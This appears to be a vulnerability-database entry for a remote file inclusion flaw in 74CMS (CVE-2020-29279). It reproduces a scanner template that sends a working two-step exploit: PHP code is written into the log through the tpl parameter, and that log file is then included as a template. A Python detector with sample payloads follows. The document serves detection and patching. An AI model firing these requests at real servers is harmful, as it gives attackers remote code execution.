CVE-2020-29279: 74CMS - Remote File Inclusion

Date: 2025-08-01 | Affected software: 74CMS | PoC: public

Vulnerability description

PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.

PoC code [public]

id: CVE-2020-29279

info:
  name: 74CMS - Remote File Inclusion
  author: DhiyaneshDK
  severity: critical
  description: |
    PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 6.0.48 or later.
  reference:
    - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/74cms/74cms%20v6.0.48%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5%2B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABgetshell.md
    - https://www.wangan.com/p/7fyg8ka5a6f81cb6
    - https://cloud.tencent.com/developer/article/1856739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29279
    epss-score: 0.49028
    epss-percentile: 0.97638
    cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: 74cms
    product: 74cms
    fofa-query: app="骑士-74CMS"
  tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=<?php phpinfo(); echo md5("{{num}}");ob_flush();?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "ThinkPHP")'
        condition: and
        internal: true

  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=data/Runtime/Logs/Home/{{replace(date_time("%Y"), "20", "")}}_{{date_time("%M_%D",unix_time())}}.log

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Version"
          - "{{md5(num)}}"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022008d318b22ffc2fc3ac37c6630cbd1d2bdd6a5b6b11d4f2681648a26bc781ebc1022100f0754e8c35c7900b108360162010780b91e207f9c248325de6a8f21de4dcfed4:922c64590222798bb761d5b6d8e72950
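
Detection-side view of the two requests in the template above, as an added example that is not part of the original template or of 74CMS: a check a log pipeline or request filter could run on requests to the assign_resume_tpl action. The function name, reason labels and sample requests are constructed for illustration, and it assumes legitimate tpl values are plain template names.

```python
import re
from urllib.parse import parse_qs, urlsplit

ACTION = "assign_resume_tpl"                      # action name taken from the template above
PHP_TAG = re.compile(r"<\?(?:php|=|\s)", re.I)    # PHP open tag inside a parameter value
LOG_REF = re.compile(r"data/runtime/logs/|\.log$", re.I)  # runtime log used as a template

def suspicious_tpl(method, target, body=""):
    """Return the reasons a request matches the pattern, or [] if it does not."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if ACTION not in (a.lower() for a in query.get("a", [])):
        return []
    # parse_qs also percent-decodes, so encoded payloads are inspected in clear form
    form = parse_qs(body, keep_blank_values=True) if method.upper() == "POST" else {}
    reasons = []
    for raw in query.get("tpl", []) + form.get("tpl", []):
        value = raw.replace("\\", "/").strip()
        if PHP_TAG.search(value):
            reasons.append("php-tag-in-tpl")      # step 1: code written into the log
        if LOG_REF.search(value):
            reasons.append("log-file-as-tpl")     # step 2: log file passed as template
    return reasons

# Constructed sample requests: (method, request target, form body)
SAMPLES = [
    ("POST", "/index.php?m=home&a=assign_resume_tpl", "variable=1&tpl=<?php echo 1;?>"),
    ("POST", "/index.php?m=home&a=assign_resume_tpl", "variable=1&tpl=%3C%3Fphp%20echo%201%3B%3F%3E"),
    ("POST", "/index.php?m=home&a=assign_resume_tpl",
     "variable=1&tpl=data/Runtime/Logs/Home/25_08_01.log"),
    ("POST", "/index.php?m=home&a=assign_resume_tpl", "variable=1&tpl=default"),
    ("GET", "/index.php?m=home&a=index", ""),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(method, target, body[:40], "->", suspicious_tpl(method, target, body))
```

Either reason on its own is worth an alert; both seen from the same client within a short window match the full sequence the template sends.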
